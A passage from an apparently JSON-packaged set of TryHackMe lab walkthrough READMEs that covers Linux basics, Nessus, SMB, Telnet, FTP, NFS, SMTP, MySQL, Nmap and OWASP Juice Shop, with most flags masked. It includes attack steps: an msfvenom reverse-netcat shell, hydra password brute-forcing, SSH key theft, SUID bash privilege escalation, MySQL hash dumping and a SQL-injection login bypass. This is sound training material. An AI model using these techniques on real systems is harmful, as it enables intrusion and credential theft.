Fundamentals](https://github.com/edoardottt/tryhackme-ctf/tree/main/Linux-Fundamentals)\n\t- `**********`\n\n- How do you run the ls command?\n\n\t- `ls`\n\n- How do you run the ls command to show all the files inside the folder?\n\n\t- `ls -a`\n\n- How do you run the ls command to not show the current directory and the previous directory in the output? (almost everything)\n\n\t- `ls -A`\n\n- How do you show the information in a long listing format using ls?\n\n\t- `ls -l`\n\n- How do you show the size in readable format? e.g. k, Mb, etc\n\n\t- `ls -h`\n\n- How do you do a recursive ls?\n\n\t- `ls --recursive`\n\n- How many files did you locate in the home folder of the user?(non-hidden and not inside other folders)\n\n\t- `13`\n\n- What is the content of cat.txt?\n\n\t- `cat cat.txt`\n\t- `************************`\n\n- What is the content of tac.txt?\n\n\t- `cat tac.txt`\n\t- `************************`\n\n- What is the content of head.txt?\n\n\t- `cat head.txt`\n\t- `************************`\n\n- What is the content of tail.txt?\n\n\t- `cat tail.txt`\n\t- `************************`\n\nWhat is the content of the xxd.txt?\n\n\t- `cat xxd.txt`\n\t- `************************`\n\n- What is the content of base64.txt?\n\n\t- `cat base64.txt`\n\t- `************************`\n\n- How many .txt files did you find in the current folder?\n\n\t- `find . -type f -name \"*.txt\"`\n\t- `8`\n\n- How many SUID files have you found inside the home folder?\n\n\t- `find . -type f -perm -4000 -exec ls -l {} \\;`\n\t- `0`\n\n- How many times does the word \"hacker\" appear in the grep files? (including variations)\n\n\t- `grep \"hacker\" *.txt`\n\t- `15`\n\n- Is the user allowed to run the above command? (Yay/Nay)\n\n\t- `sudo -l`\n\t- `Nay`\n\n- Read the above.\n\n\t no answer needed\n\n- What command would you use to echo the word \"Hackerman\" ?\n\n\t- `echo \"Hackerman\"`\n\n- How would you read all files with extension .bak using xargs?\n\n\t- `find / -name *.bak -type f -print | xargs /bin/cat`\n\n- Read the above.\n\n\t no answer needed\n\n- How would you grab the headers silently of [https://tryhackme.com](https://tryhackme.com) but grepping only the HTTP status code?\n\n\t- `curl -I -s https://tryhackme.com | grep http`\n\n- What command would you run to get the flag.txt from [https://tryhackme.com/](https://tryhackme.com) ?\n\n\t- `wget https://ryhackme.com/flag.txt`\n\n- What command would you run to download recursively up to level 5 from [https://tryhackme.com](https://tryhackme.com) ?\n\n\t- `wget -R https://tryhackme.com/`\n\n- What is the flag from the tar file?\n\n\t- `tar -xf tarball.tar`\n\t- `cat flag.txt`\n\t- `********************`\n\n- What is the content of gzip.txt?\n\n\t- `gzip -d gzip.txt.gz`\n\t- `cat gzip.txt`\n\t- `******************`\n\n- What is the flag inside the 7zip file?\n\n\t- `7z x 7zip.7z`\n\t- `cat 7zip.txt`\n\t- `******************`\n\n- What is the content of binwalk.txt?\n\n\t- `binwalk -e binwalk.png`\n\t- `ls _binwalk.png.extracted`\n\t- `cat _binwalk.png.extracted/binwalk.txt`\n\t- `*******************`\n\n\n" }, { "path": "Nessus/README.md", "content": "# Nessus\n\n- I have read the description!\n\n\t no answer needed\n\n- Go to https://www.tenable.com/products/nessus/nessus-essentials and register an account. \n\n\t no answer needed\n\n- We will then download the `Nessus-#.##.#-debian6_amd64.deb` file\n\n\t no answer needed\n\n- In the terminal we will navigate to that folder and run the following command: `sudo dpkg -i package_file.deb`\n\n\t no answer needed\n\n- We will now start the Nessus Service with the command: `sudo /bin/systemctl start nessusd.service`\n\n\t no answer needed\n\n- Open up Firefox and goto the following URL: https://localhost:8834/\n\n\t no answer needed\n\n- Next, we will set up the scanner. Select the option Nessus Essentials\n\n\t no answer needed\n\n- Fill out the Username and Password fields. Make sure to use a strong password!\n\n\t no answer needed\n\n- Nessus will now install the plugins required for it to function.\n\n\t no answer needed\n\n- Log in with the account credentials you made earlier.\n\n\t no answer needed\n\n- You have now successfully installed Nessus!\n\n\t no answer needed\n\n- What is the name of the button which is used to launch a scan?\n\n\t- `new scan`\n\n- What side menu option allows us to create custom templates?\n\n\t- `policies`\n\n- What menu allows us to change plugin properties such as hiding them or changing their severity?\n\n\t- `plugin rules`\n\n- In the 'Scan Templates' section after clicking on 'New Scan', what scan allows us to see simply what hosts are alive?\n\n\t- `host discovery`\n\n- One of the most useful scan types, which is considered to be 'suitable for any host'?\n\n\t- `basic network scan`\n\n- What scan allows you to 'Authenticate to hosts and enumerate missing updates'?\n\n\t- `credential patch audit`\n\n- What scan is specifically used for scanning Web Applications? \n\n\t- `web application tests`\n\n- Create a new 'Basic Network Scan' targeting the deployed VM. What option can we set under 'BASIC' (on the left) to set a time for this scan to run? This can be very useful when network congestion is an issue.\n\n\t- `schedule`\n\n- Under 'DISCOVERY' (on the left) set the 'Scan Type' to cover ports 1-65535. What is this type called?\n\n\t- `port scan (all ports)`\n\n- What 'Scan Type' can we change to under 'ADVANCED' for lower bandwidth connection?\n\n\t- `scan low bandwidth links`\n\n- With these options set, launch the scan. \n\n\t no answer needed\n\n- After the scan completes, which 'Vulnerability' in the 'Port scanners' family can we view the details of to see the open ports on this host?\n\n\t- `Nessus SYN scanner`\n\n- What Apache HTTP Server Version is reported by Nessus?\n\n\t- `2.4.**`\n\n- What is the plugin id of the plugin that determines the HTTP server type and version?\n\n\t- Google it\n\t- `*****`\n\n- What authentication page is discovered by the scanner that transmits credentials in cleartext?\n\n\t- `*****.php`\n\n- What is the file extension of the config backup?\n\n\t- `.bak`\n\n- Which directory contains example documents? (This will be in a php directory)\n\n\t- `/********/phpids/*.*/****/********/`\n\n- What vulnerability is this application susceptible to that is associated with X-Frame-Options?\n\n\t- `C************`\n\n\n" }, { "path": "Network-Services/README.md", "content": "# Network Services\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does SMB stand for?\n\n\t- `Server Message Block`\n\n- What type of protocol is SMB?\n\n\t- `response-request`\n\n- What do clients connect to servers using?\n\n\t- `TCP/IP`\n\n- What systems does Samba run on?\n\n\t- `Unix`\n\n- Conduct an nmap scan of your choosing, How many ports are open?\n\n\t- `nmap -p- -A `\n\t- `*`\n\n- What ports is SMB running on?\n\n\t- `139/445`\n\n- Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?\n\n\t- `enum4linux -A `\n\t- `**********`\n\n- What comes up as the name of the machine?\n\n\t- `polosmb`\n\n- What operating system version is running?\n\n\t- `6.1`\n\n- What share sticks out as something we might want to investigate?\n\n\t- `profiles`\n\n- What would be the correct syntax to access an SMB share called \"secret\" as user \"suit\" on a machine with the IP 10.10.10.2 on the default port?\n\n\t- `smbclient //10.10.10.2/secret -U suit -p 139`\n\n- Great! Now you've got a hang of the syntax, let's have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.\n\n\t no answer needed\n\n- Does the share allow anonymous access? Y/N?\n\n\t- `Y`\n\n- Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?\n\n\t- `get \"Working From Home Information.txt\"`\n\t- Outside smb `cat \"Working From Home Information.txt\"`\n\t- `John ******`\n\n- What service has been configured to allow him to work from home?\n\n\t- `ssh`\n\n- Okay! Now we know this, what directory on the share should we look in?\n\n\t- `.ssh`\n\n- This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?\n\n\t- `cd .ssh`\n\t- `ls`\n\n- What is the smb.txt flag?\n\n\t- `get id_rsa`\n\t- `chmod 600 id_rsa`\n\t- `ssh cactus@ -i id_rsa`\n\t- `cat smb.txt`\n\t- `***************`\n\n- What is Telnet?\n\n\t- `application protocol`\n\n- What has slowly replaced Telnet?\n\n\t- `ssh`\n\n- How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?\n\n\t- `telnet 10.10.10.3 23`\n\n- The lack of what, means that all Telnet communication is in plaintext?\n\n\t- `encryption`\n\n- How many ports are open on the target machine?\n\n\t- `nmap -p- -A `\n\t- or `scilla port -target `\n\t- `1`\n\n- What port is this?\n\n\t- `****`\n\n- This port is unassigned, but still lists the protocol it's using, what protocol is this? \n\n\t- `tcp`\n\n- Now re-run the nmap scan, without the -p- tag, how many ports show up as open?\n\n\t- `0`\n\n- Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.\n\n\t no answer needed\n\n- Based on the title returned to us, what do we think this port could be used for?\n\n\t- `a backdoor`\n\n- Who could it belong to? Gathering possible usernames is an important step in enumeration.\n\n\t- `skidy`\n\n- Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.\n\n\t no answer needed\n\n- Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.\n\n\t no answer needed\n\n- Great! It's an open telnet connection! What welcome message do we receive?\n\n\t- `SKIDY'S BACKDOOR.`\n\n- Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)\n\n\t- `N`\n\n- Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.\n\n\t no answer needed\n\n- This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.\n\n\t no answer needed\n\n- Now, use the command \"ping [local THM ip] -c 1\" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)\n\n\t- `Y`\n\n- Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!\n\n\t no answer needed\n\n- What word does the generated payload start with?\n\n\t- `msfvenom -p cmd/unix/reverse_netcat lhost= lport=4444 R`\n\t- `mkfifo`\n\n- What would the command look like for the listening port we selected in our payload?\n\n\t- `nc -lvp 4444`\n\n- Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!\n\n\t no answer needed\n\n- Success! What is the contents of flag.txt?\n\n\t- `THM{**********************}`\n\n- What communications model does FTP use?\n\n\t- `client-server`\n\n- What's the standard FTP port?\n\n\t- `21`\n\n- How many modes of FTP connection are there?\n\n\t- `2`\n\n- How many ports are open on the target machine?\n\n\t- `scilla port -target `\n\t- `*`\n\n- What port is ftp running on?\n\n\t- `21`\n\n- What variant of FTP is running on it?\n\n\t- `nmap -p- -A `\n\t- `vsFTPd`\n\n- What is the name of the file in the anonymous FTP directory?\n\n\t- `ftp `, `anonymous` and no pwd.\n\t- `ls`\n\t- `**************.txt`\n\n- What do we think a possible username\ncould be?\n\n\t- `get *************.txt`\n\t- Then on your machine `cat *************.txt`\n\t- `Mike`\n\n- Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that...\n\n\t no answer needed\n\n- What is the password for the user \"mike\"?\n\n\t- `hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp`\n\t- `********`\n\n- Bingo! Now, let's connect to the FTP server as this user using \"ftp [IP]\" and entering the credentials when prompted\n\n\t no answer needed\n\n- What is ftp.txt?\n\n\t- `ftp `, `mike` and password.\n\t- `ls`\n\t- `get ftp.txt`\n\t- `exit`\n\t- `cat ftp.txt`\n\t- `THM{*********************}`\n\n- Well done, you did it!\n\n\t no answer needed\n\n\n\n\n\n" }, { "path": "Network-Services-2/README.md", "content": "# Network Services 2\n\n- Ready? Let's get going!\n\n\t no answer needed\n\n- What does NFS stand for?\n\n\t- `Network File System`\n\n- What process allows an NFS client to interact with a remote directory as though it was a physical device?\n\n\t- `Mounting`\n\n- What does NFS use to represent files and directories on the server?\n\n\t- `file handle`\n\n- What protocol does NFS use to communicate between the server and client?\n\n\t- `rpc`\n\n- What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2\n\n\t- `user id / group id`\n\n- Can a Windows NFS server share files with a Linux client? (Y/N)\n\n\t- `Y`\n\n- Can a Linux NFS server share files with a MacOS client? (Y/N)\n\n\t- `Y`\n\n- What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.\n\n\t- `*.2`\n\n- Conduct a thorough port scan scan of your choosing, how many ports are open?\n\n\t- `nmap -p- -A `\n\t- `*`\n\n- Which port contains the service we're looking to enumerate?\n\n\t- `****`\n\n- Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?\n\n\t- `/****`\n\n- what is the name of the folder inside?\n\n\t- `sudo mount -t nfs :/**** /tmp/mount -nolock`\n\t- `*********`\n\n- Have a look inside this directory, look at the files. Looks like we're inside a user's home directory...\n\n\t no answer needed\n\n- Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?\n\n\t- `.ssh`\n\n- Which of these keys is most useful to us?\n\n\t- `id_rsa`\n\n- Can we log into the machine using ssh -i @ ? (Y/N)\n\n\t- `chmod 600 id_rsa`\n\t- `ssh -i id_rsa *********@`\n\t- `Y`\n\n- First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user's home directory.\n\n\t no answer needed\n\n- Download the bash executable to your Downloads directory. Then use \"cp ~/Downloads/bash .\" to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using \"sudo chown root bash\"\n\n\t no answer needed\n\n\t- On your machine `nc -lnvp 4444 > bash`\n\t- On target `nc 4444 < /bin/bash`\n\t- `sudo chown root bash`\n\n- What letter do we use to set the SUID bit set using chmod?\n\n\t- `s`, remember also `x`.\n\n- What does the permission set look like? Make sure that it ends with -sr-x.\n\n\t- `-rwsr-sr-x`\n\n- The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.\n\n\t no answer needed\n\n- Great! If all’s gone well you should have a shell as root! What’s the root flag?\n\n\t- `********************`\n\n- What does SMTP stand for?\n\n\t- `Simple Mail Transfer Protocol`\n\t\n- What does SMTP handle the sending of?\n\n\t- `emails`\n\n- What is the first step in the SMTP process?\n\n\t- `SMTP handshake`\n\n- What is the default SMTP port?\n\n\t- `25`\n\n- Where does the SMTP server send the email if the recipient's server is not available?\n\n\t- `smtp queue`\n\n- On what server does the Email ultimately end up on?\n\n\t- `pop/imap`\n\n- Can a Linux machine run an SMTP server? (Y/N)\n\n\t- `Y`\n\n- Can a Windows machine run an SMTP server? (Y/N)\n\n\t- `Y`\n\n- First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?\n\n\t- `nmap -A -p- `\n\t- `**`\n\n- Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?\n\n\t- `msfconsole`\n\n- Let's search for the module `smtp_version`, what's it's full module name?\n\n\t- `search smtp_version`\n\t- `************/********/smtp/smtp_version`\n\n- Great, now- select the module and list the options. How do we do this?\n\n\t- `options`\n\n- Have a look through the options, does everything seem correct? What is the option we need to set?\n\n\t- `rhosts`\n\n- Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?\n\n\t- `polosmtp.****`\n\n- What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.\n\n\t- `*******`\n\n- Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module `smtp_enum`, what's it's full module name?\n\n\t- `search smtp_enum`\n\t- `**********/*******/smtp/smtp_enum`\n\n- What option do we need to set to the wordlist's path?\n\n\t- `user_file`\n\n- Once we've set this option, what is the other essential paramater we need to set?\n\n\t- `RHOSTS`\n\n- Now, set the THREADS parameter to 16 and run the exploit, this may take a few minutes, so grab a cup of tea, coffee, water. Keep yourself hydrated!\n\n\t no answer needed\n\n- Okay! Now that's finished, what username is returned?\n\n\t- `******************`\n\n- What is the password of the user we found during our enumeration stage?\n\n\t- `hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV ssh`\n\t- `**********`\n\n- Great! Now, let's SSH into the server as the user, what is contents of smtp.txt\n\n\t- `ssh USERNAME@`\n\t- `cat smtp.txt`\n\t- `******************************************`\n\n- What type of software is MySQL?\n\n\t- `relational database management system`\n\n- What language is MySQL based on?\n\n\t- `sql`\n\n- What communication model does MySQL use?\n\n\t- `client-server`\n\n- What is a common application of MySQL?\n\n\t- `back end database`\n\n- What major social network uses MySQL as their back-end database? This will require further research.\n\n\t- `Facebook`\n\n- As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?\n\n\t- `nmap -a -p- `\n\t- `3***`\n\n- Good, now- we think we have a set of credentials. Let's double check that by manually connecting to the MySQL server. We can do this using the command \"mysql -h [IP] -u [username] -p\"\n\n\t no answer needed\n\n\n- Okay, we know that our login credentials work. Lets quit out of this session with \"exit\" and launch up Metasploit.\n\n\t no answer needed\n\n- We're going to be using the `mysql_sql` module. Search for, select and list the options it needs. What three options do we need to set? (in descending order).\n\n\t- `password/rhosts/username`\n\n- Run the exploit. By default it will test with the \"select module()\" command, what result does this give you?\n\n\t- `*.7.29-0ubuntu0.**.**.*`\n\n- Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the \"sql\" option to \"show databases\". how many databases are returned?\n\n\t- `set sql show databases`\n\t- `run`\n\t- `*`\n\n- First, let's search for and select the \"mysql_schemadump\" module. What's the module's full name?\n\n\t- `**********/*******/mysql/mysql_schemadump`\n\n- Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?\n\n\t- `x$waits_global_**_********`\n\n- Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the `mysql_hashdump` module. What's the module's full name?\n\n\t- `**********/*******/mysql/mysql_hashdump`\n\n- Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?\n\n\t- `Carl`\n\n- What is the user/hash combination string?\n\n\t- `Carl:*EA031893AA21444B17**************************`\n\n- Now, we need to crack the password! Let's try John the Ripper against it using: \"john hash.txt\" what is the password of the user we found? \n\n\t- `******`\n\n- What's the contents of MySQL.txt\n\n\t- `ssh USER@`, `yes` and enter the password.\n\t- `ls`\n\t- `cat MySQL.txt`\n\t- `**********************************************`\n\n- Congratulations! You did it!\n\n\t no answer needed\n\n\n\n" }, { "path": "Networking/README.md", "content": "# Networking\n\n- How many categories of IPv4 addresses are there?\n\n\t- `5`\n\n- Which type is for research? *Looking for a letter rather than a number here\n\n\t- `e`\n\n- How many private address ranges are there?\n\n\t- `3`\n\n- Which private range is typically used by businesses?\n\n\t- `a`\n\n- There are two common default private ranges for home routers, what is the first one?\n\n\t- `192.168.0.0`\n\n- How about the second common private home range?\n\n\t- `192.168.1.0`\n\n- How many addresses make up a typical class C range? Specifically a /24 \n\n\t- `256`\n\n- Of these addresses two are reserved, what is the first address typically reserved as?\n\n\t- `network`\n\n- The very last address in a range is typically reserved as what address type?\n\n\t- `broadcast`\n\n- A third predominant address type is typically reserved for the router, what is the name of this address type?\n\n\t- `gateway`\n\n- Which address is reserved for testing on individual computers?\n\n\t- `127.0.0.1`\n\n- A particularly unique address is reserved for unroutable packets, what is that address? This can also refer to all IPv4 addresses on the local machine.\n\n\t- `0.0.0.0`\n\n- 1001 0010\n\n\t- `146`\n\n- 0111 0111\n\n\t- `119`\n\n- 1111 1111\n\n\t- `255`\n\n- 1100 0101\n\n\t- `197`\n\n- 1111 0110\n\n\t- `246`\n\n- 0001 0011\n\n\t- `19`\n\n- 1000 0001\n\n\t- `129`\n\n- 0011 0001\n\n\t- `49`\n\n- 0111 1000\n\n\t- `120`\n\n- 1111 0000\n\n\t- `240`\n\n- 0011 1011\n\n\t- `59`\n\n- 0000 0111\n\n\t- `7`\n\n- 238\n\n\t- `11101110`\n\n- 34\n\n\t- `00100010`\n\n- 123\n\n\t- `01111011`\n\n- 50\n\n\t- `00110010`\n\n- 255\n\n\t- `11111111`\n\n- 200\n\n\t- `11001000`\n\n- 10\n\n\t- `00001010`\n\n- 138\n\n\t- `10001010`\n\n- 1\n\n\t- `00000001`\n\n- 13\n\n\t- `00001011`\n\n- 250\n\n\t- `11111010`\n\n- 114\n\n\t- `01110010`\n\n- 10.240.1.1\n\n\t- `a`\n\n- 150.10.15.0\n\n\t- `b`\n\n- 192.14.2.0\n\n\t- `c`\n\n- 148.17.9.1\n\n\t- `b`\n\n- 193.42.1.1\n\n\t- `c`\n\n- 126.8.156.0\n\n\t- `a`\n\n- 220.200.23.1\n\n\t- `c`\n\n- 230.230.45.58\n\n\t- `d`\n\n- 177.100.18.4\n\n\t- `b`\n\n- 119.18.45.0\n\n\t- `a`\n\n- 117.89.56.45\n\n\t- `a`\n\n- 215.45.45.0\n\n\t- `c`\n\n\n\n\n\n" }, { "path": "Ninja-Skills/README.md", "content": "# Ninja Skills\n\n- Which of the above files are owned by the best-group group(enter the answer separated by spaces in alphabetical order)\n\n\t- This is our base command: `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null`\n\t- `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null | xargs ls -alh`\n\t- `D8B3 v2Vb`\n\n- Which of these files contain an IP address?\n\n\t- `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null | xargs grep -Eo \"([0-9]{1,3}[\\.]){3}[0-9]{1,3}\"`\n\t- `oiMO`\n\n- Which file has the SHA1 hash of 9d54da7584015647ba052173b84d45e8007eba94\n\n\t- `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null | xargs sha1sum`\n\t- `c4ZX`\n\n- Which file contains 230 lines?\n\n\t- The solution is `bny0`, but this file is not shown on the ls output. I'm doing something wrong?\n\n- Which file's owner has an ID of 502?\n\n\t- `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null | xargs ls -ln`\n\t- `X1Uy`\n\n- Which file is executable by everyone?\n\n\t- `find / -type f \\( -name 8V2L -o -name bny0 -o -name c4ZX -o -name D8B3 -o -name FHl1 -o -name oiMO -o -name PFbD -o -name rmfX -o -name SRSq -o -name uqyw -o -name v2Vb -o -name X1Uy \\) 2>>/dev/null | xargs ls -la`\n\t- `8V2L`\n\n\n\n\n\n\n" }, { "path": "Nmap/README.md", "content": "# Nmap\n\n- Deploy the attached VM\n\n\t no answer needed\n\n- What networking constructs are used to direct traffic to the right application on a server?\n\n\t- `ports`\n\n- How many of these are available on any network-enabled computer?\n\n\t- `65535`\n\n- [Research] How many of these are considered \"well-known\"? (These are the \"standard\" numbers mentioned in the task)\n\n\t- `1024`\n\n- What is the first switch listed in the help menu for a 'Syn Scan' (more on this later!)?\n\n\t- `-sS`\n\n- Which switch would you use for a \"UDP scan\"?\n\n\t- `-sU`\n\n- If you wanted to detect which operating system the target is running on, which switch would you use?\n\n\t- `-O`\n\n- Nmap provides a switch to detect the version of the services running on the target. What is this switch?\n\n\t- `-sV`\n\n- The default output provided by nmap often does not provide enough information for a pentester. How would you increase the verbosity?\n\n\t- `-v`\n\n- Verbosity level one is good, but verbosity level two is better! How would you set the verbosity level to two?\n(Note: it's highly advisable to always use at least this option)\n\n\t- `-vv`\n\n- We should always save the output of our scans -- this means that we only need to run the scan once (reducing network traffic and thus chance of detection), and gives us a reference to use when writing reports for clients.\nWhat switch would you use to save the nmap results in three major formats?\n\n\t- `-oA`\n\n- What switch would you use to save the nmap results in a \"normal\" format?\n\n\t- `-oN`\n\n- A very useful output format: how would you save results in a \"grepable\" format?\n\n\t- `-oG`\n\n- Sometimes the results we're getting just aren't enough. If we don't care about how loud we are, we can enable \"aggressive\" mode. This is a shorthand switch that activates service detection, operating system detection, a traceroute and common script scanning.\nHow would you activate this setting?\n\n\t- `-A`\n\n- Nmap offers five levels of \"timing\" template. These are essentially used to increase the speed your scan runs at. Be careful though: higher speeds are noisier, and can incur errors!\nHow would you set the timing template to level 5?\n\n\t- `-t5`\n\n- We can also choose which port(s) to scan.\nHow would you tell nmap to only scan port 80?\n\n\t- `-p 80`\n\n- How would you tell nmap to scan ports 1000-1500?\n\n\t- `-p 1000-1500`\n\n- A very useful option that should not be ignored:\nHow would you tell nmap to scan all ports?\n\n\t- `-p-`\n\n- How would you activate a script from the nmap scripting library (lots more on this later!)?\n\n\t- `--script`\n\n- How would you activate all of the scripts in the \"vuln\" category?\n\n\t- `--script=vuln`\n\n- Read the Scan Types Introduction.\n\n\t no answer needed\n\n- Which RFC defines the appropriate behaviour for the TCP protocol?\n\n\t- `RFC 793`\n\n- If a port is closed, which flag should the server send back to indicate this?\n\n\t- `rst`\n\n- There are two other names for a SYN scan, what are they?\n\n\t- `Half-open,stealth`\n\n- Can Nmap use a SYN scan without Sudo permissions (Y/N)?\n\n\t- `N`\n\n- If a UDP port doesn't respond to an Nmap scan, what will it be marked as?\n\n\t- `open|filtered`\n\n- When a UDP port is closed, by convention the target should send back a \"port unreachable\" message. Which protocol would it use to do so?\n\n\t- `icmp`\n\n- Which of the three shown scan types uses the URG flag?\n\n\t- `Xmas`\n\n- Why are NULL, FIN and Xmas scans generally used?\n\n\t- `firewall evasion`\n\n- Which common OS may respond to a NULL, FIN or Xmas scan with a RST for every port?\n\n\t- `Microsoft Windows`\n\n- How would you perform a ping sweep on the 172.16.x.x network (Netmask: 255.255.0.0) using Nmap? (CIDR notation)\n\n\t- `nmap -sn 172.16.0.0/16`\n\n- What language are NSE scripts written in?\n\n\t- `Lua`\n\n- Which category of scripts would be a very bad idea to run in a production environment?\n\n\t- `intrusive`\n\n- What optional argument can the ftp-anon.nse script take?\n\n\t- `maxlist`\n\n- Search for \"smb\" scripts in the /usr/share/nmap/scripts/ directory using either of the demonstrated methods.\nWhat is the filename of the script which determines the underlying OS of the SMB server?\n\n\t- `ls -lah | grep smb`\n\t- `smb-os-discovery.nse`\n\n- Read through this script. What does it depend on?\n\n\t- `cat smb-os-discovery.nse`, see the line `dependencies = {\"smb-brute\"}`\n\t- `smb-brute`\n\n- Which simple (and frequently relied upon) protocol is often blocked, requiring the use of the -Pn switch?\n\n\t- `icmp`\n\n- [Research] Which Nmap switch allows you to append an arbitrary length of random data to the end of packets?\n\n\t- `--data-length`\n\n- Does the target () respond to ICMP (ping) requests (Y/N)?\n\n\t- `N`\n\n- Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?\n\n\t- `sudo nmap -sX -vv -Pn -p -999 `\n\t- `999`\n\n- There is a reason given for this -- what is it?\nNote: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!\n\n\t- `no responses`\n\n- Perform a TCP SYN scan on the first 10000 ports of the target -- how many ports are shown to be open?\n\n\t- `sudo nmap -sS -Pn -vv -p -10000 `\n\t- `5`\n\n- Open Wireshark and perform a TCP Connect scan against port 80 on the target, monitoring the results. Make sure you understand what's going on.\n\n\t no answer needed\n\n- Deploy the ftp-anon script against the box. Can Nmap login successfully to the FTP server on port 21? (Y/N)\n\n\t- `Y`\n\n- Read the conclusion.\n\n\t no answer needed\n\n\n\n" }, { "path": "OWASP-Juice-Shop/README.md", "content": "# OWASP Juice Shop\n\n\n- Deploy the VM attached to this task to get started! You can access this machine by using your browser-based machine, or if you're connected through OpenVPN.\n\n\t no answer needed\n\n- Once the machine has loaded, access it by copying and pasting its IP into your browser; if you're using the browser-based machine, paste the machines IP into a browser on that machine.\n\n\t no answer needed\n\n- What's the Administrator's email address?\n\n\t- `admin@juice-sh.op`\n\n- What parameter is used for searching? \n\n\t- `q`\n\n- What show does Jim reference in his review?\n\n\t- `star trek`\n\n- Log into the administrator account!\n\n\t- Perform a login request when Burp is capturing.\n\n\t~~~\n\t\tPOST /rest/user/login HTTP/1.1\n\t\tHost: 10.10.122.116\n\t\tUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n\t\tAccept: application/json, text/plain, */*\n\t\tAccept-Language: en-US,en;q=0.5\n\t\tAccept-Encoding: gzip, deflate\n\t\tContent-Type: application/json\n\t\tContent-Length: 49\n\t\tOrigin: http://10.10.122.116\n\t\tConnection: close\n\t\tReferer: http://10.10.122.116/\n\t\tCookie: io=XFm7soxYpXet9JAKAAAA; language=en; cookieconsent_status=dismiss\n\t\t{\"email\":\"email@email.org\",\"password\":\"password\"}\n\t~~~\n\t\n\t- We change this request in:\n\t~~~\n\t\tPOST /rest/user/login HTTP/1.1\n\t\tHost: 10.10.122.116\n\t\tUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n\t\tAccept: application/json, text/plain, */*\n\t\tAccept-Language: en-US,en;q=0.5\n\t\tAccept-Encoding: gzip, deflate\n\t\tContent-Type: application/json\n\t\tContent-Length: 49\n\t\tOrigin: http://10.10.122.116\n\t\tConnection: close\n\t\tReferer: http://10.10.122.116/\n\t\tCookie: io=XFm7soxYpXet9JAKAAAA; language=en; cookieconsent_status=dismiss\n\t\t{\"email\":\"' OR 1=1--\",\"password\":\"password\"}\n\t~~~\n\t- And forward this request.\n\t- `32***0f21372b*******608************0e02a`\n\n- Log into the Bender account!\n\n\t- Capture another login request or change the previous one to this:\n\t~~~\n\t\tPOST /rest/user/login HTTP/1.1\n\t\tHost: 10.10.122.116\n\t\tUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n\t\tAccept: application/json, text/plain, */*\n\t\tAccept-Language: en-US,en;q=0.5\n\t\tAccept-Encoding: gzip, deflate\n\t\tContent-Type: application/json\n\t\tContent-Length: 45\n\t\tOrigin: 